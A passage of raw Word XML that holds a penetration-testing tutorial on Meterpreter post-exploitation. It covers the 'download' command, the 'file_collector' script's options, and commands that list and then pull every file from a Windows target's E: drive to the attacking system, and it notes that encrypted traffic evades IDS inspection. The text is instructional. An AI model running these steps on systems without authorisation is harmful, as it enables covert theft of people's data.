        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell has a lot of neat features, including encryption of all the traffic between our attacking system and target. This prevents any interception and scanning of the data from intrusion detection systems (IDS).</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b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Downloading individual files</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">From the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> console it is possible to download individual files using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">"download" command. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Which is pretty straightforward and easy if you only want to download one file.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07469" w:rsidRPr="00F07469" w:rsidRDefault="00F07469" w:rsidP="00F07469">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C6C9DAD" wp14:editId="0DE9C533">
            <wp:extent cx="3810000" cy="590550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="Picture 10" descr="http://4.bp.blogspot.com/_2IvFH57W8Hc/TMiBfKWX_9I/AAAAAAAAADY/UDzFXWLgrmE/s400/download1.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4.bp.blogspot.com/_2IvFH57W8Hc/TMiBfKWX_9I/AAAAAAAAADY/UDzFXWLgrmE/s400/download1.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590550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07469" w:rsidRPr="00F07469" w:rsidRDefault="00F07469" w:rsidP="00F07469">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> has a lot of useful inbuilt scripts to make post exploitation tasks such as data collection easier. To view the options, simply type "run" and then space-tab-tab </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>to see the auto-completion options:</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p>
    <w:p w:rsidR="00F07469" w:rsidRPr="00F07469" w:rsidRDefault="00F07469" w:rsidP="00F07469">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3218DD2A" wp14:editId="7EE96F5E">
            <wp:extent cx="3810000" cy="1571625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="9" name="Picture 9" descr="http://3.bp.blogspot.com/_2IvFH57W8Hc/TMiDRKpCqQI/AAAAAAAAADc/J4TwneVKTwA/s400/runoptions.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3.bp.blogspot.com/_2IvFH57W8Hc/TMiDRKpCqQI/AAAAAAAAADc/J4TwneVKTwA/s400/runoptions.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1571625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07469" w:rsidRPr="00F07469" w:rsidRDefault="00F07469" w:rsidP="00F07469">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pP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b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's look at "run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>file_collector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>" first:</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t>In the example below, I wanted to copy all the data from the E: drive of a Windows target, with the exception of a couple of directories that I am not interested in.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>(In this actual example I am copying some files from a "Teach yourself C for Linux in 21 days" CD which is in the drive on the target system, onto my attacking system ;o)</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t xml:space="preserve">To view the "run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>file_collector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>" options, use "-h"</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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>file_collector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Script for searching and downloading files that</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>match a specific pattern. First save files to a file, edit and</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">use that same file to download the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>choosen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> files.</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t>OPTIONS:</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t>    -d   Directory to start search on, search will be recursive.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>-f   Search blobs separated by a |.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>-h        Help menu.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>    -i   Input file with list of files to download, one per line.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>-l   Location where to save the files.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>-o   Output File to save the full path of files found.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>-r        Search subdirectories.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</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t>As you can see in the description, this is a three stage process. First, we create a file list, then we remove any files we don't want from the list, then we execute the download process.</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b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Creating the file list</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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>file_collector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r -d e:\\ -f * -o /root/Courses/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>CforLinux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>/file.txt</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t>We are running the collector recursively, looking for all files on the E: drive, and storing a list of these files in a "file.txt" file on my attacking system.</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t xml:space="preserve">As </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> copies files over an encrypted connection, this can make the data transfer slower, so best to strip out any unneeded files.</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b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Editing the file list</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t xml:space="preserve">I don't need some of the directories on the target data drive, so I use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to remove these, and make a new file "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>file.lst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>".</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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> /root/Courses/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>CforLinux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
